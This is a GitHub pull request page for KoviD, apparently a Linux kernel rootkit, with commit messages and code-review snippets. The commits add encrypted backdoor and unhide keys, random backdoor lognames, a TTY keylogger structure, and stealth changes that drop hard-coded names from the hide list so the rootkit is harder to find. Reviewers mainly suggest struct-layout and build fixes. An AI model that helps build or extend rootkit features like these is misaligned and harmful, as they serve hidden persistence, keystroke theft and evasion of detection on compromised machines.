Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Kvdev #177

Merged
merged 18 commits into from
Jan 6, 2025
Merged

Kvdev #177

merged 18 commits into from
Jan 6, 2025

Conversation

carloslack
Copy link
Owner

No description provided.

JNE and others added 15 commits January 3, 2025 10:00
@carloslack
backdoor: use random & variable length lognames
953bed2
@carloslack
crypto: Encrypt unhide key
34b0343 
Just like back-door key, encrypt unhide as well.
Also applied drive-by fixes
@carloslack
sys: Add simple switch for x64 syscalls
19a1405
@carloslack
tty: gets its own source file
32b98ef 
Also: 	crypto: re-work API names init
	Re-organize error exit
@carloslack
Remove warn when building in debug
1bede7a 
Move it from source code to
Makefile and highlight important
build information.
@carloslack
tty: Finish moving tty pieces around
c1a5f97 
Also API now expects struct file and list_head
Note: multiple contexts untested, unsupported for now.
@carloslack
tty: Add tty context for API
9160591
@carloslack
tty: Apply minor changes and work around merge issue
7879724
@carloslack
clang: apply format
4ba72e4
@carloslack
codeql: Address warning
7abd694
@carloslack
clang: base-address removed by accident
cea2d24 
and remove useless copy modification
@carloslack
sys: update for syscall variant
df5a1a4
@carloslack
tests: Make it pass for now x86-64
a2d3999 
This is not a fix, need to work out how
it the test will understand the difference
@carloslack
crypto: Use single shared instance for both bd and unhide keys
738ed9e 
broken by this commit (debug only):
        get-bdkey
        get-unhidekey

Both commands need now to fetch the keys from mgc
crypto: update get-bdkey and get-unhidekey
c9224b8 
Debug mode only.

decrypt and present to user via proc UI.
@carloslack carloslack requested a review from djolertrk January 4, 2025 12:02
github-advanced-security[bot]
github-advanced-security bot found potential problems Jan 4, 2025
View reviewed changes
src/kovid.c Fixed Show fixed Hide fixed
djolertrk
djolertrk reviewed Jan 6, 2025
View reviewed changes
Makefile
@@ -32,7 +32,7 @@ COMPILER_OPTIONS := -Wall -Wno-vla -DPROCNAME='"$(PROCNAME)"' \
EXTRA_CFLAGS := -I$(src)/src -I$(src)/fs ${COMPILER_OPTIONS}

SRC := src/${OBJNAME}.c src/pid.c src/fs.c src/sys.c \
src/sock.c src/util.c src/vm.c src/crypto.c
src/sock.c src/util.c src/vm.c src/crypto.c src/tty.c
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Can you please add this into https://github.com/carloslack/KoviD/blob/master/CMakeLists.txt#L109 as well? It is not being used by default (yet), but at least let it compile, so just add that source into the list.

src/auto.h
#ifndef __AUTO_H
#define __AUTO_H

static uint64_t __attribute__((unused)) auto_bdkey = 0x0000000000000000;
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Nice

src/kovid.c
Comment on lines -44 to -47
#ifdef DEBUG_RING_BUFFER
#pragma message "!!! Be careful: Build kovid in DEBUG mode !!!"
#endif

Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Why do you think this message is not useful anymore?

src/kovid.c
@@ -476,19 +472,51 @@ static const match_table_t tokens = {
{ Opt_unhide_directory, "unhide-directory=%s" },

{ Opt_journalclt, "journal-flush" },
{ Opt_fetch_base_address, "base-address=%d" },
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks :D

src/kovid.c Outdated
Comment on lines 483 to 487
struct userdata_t {
bool ok;
int op;
uint64_t address_value;
};
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more. 

struct userdata_t {
	uint64_t address_value;
	int op;
	bool ok;
};

better layout for the struct, right?

src/kovid.c
snprintf(bits, 32, "%lx", auto_bdkey);
set_elfbits(bits);
} break;
case Opt_get_bdkey:
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

cool, looks good

djolertrk
djolertrk reviewed Jan 6, 2025
View reviewed changes
src/kovid.c Outdated
Comment on lines 487 to 490
struct check_unhidekey_t {
bool ok;
uint64_t address_value;
};
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more. 

struct check_unhidekey_t {
    uint64_t address_value;
    bool ok;
};

djolertrk
djolertrk reviewed Jan 6, 2025
View reviewed changes
src/tty.c Outdated
Comment on lines 14 to 19
struct keylog_t {
char buf[KEY_LOG_BUF_MAX+2]; /** newline+'\0' */
int offset;
uid_t uid;
struct list_head list;
};
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

the layout can be better

JNE added 2 commits January 6, 2025 09:59
stealth: remove hard-coded names from hide list
a30a993 
It is a weakness having them
Suppose you want to find the rootkit?

$ >kv
$ ls kv
Address review comments
25ad9c8
@carloslack carloslack merged commit e1020fa into master Jan 6, 2025
2 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@djolertrk djolertrk djolertrk approved these changes

Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@carloslack @djolertrk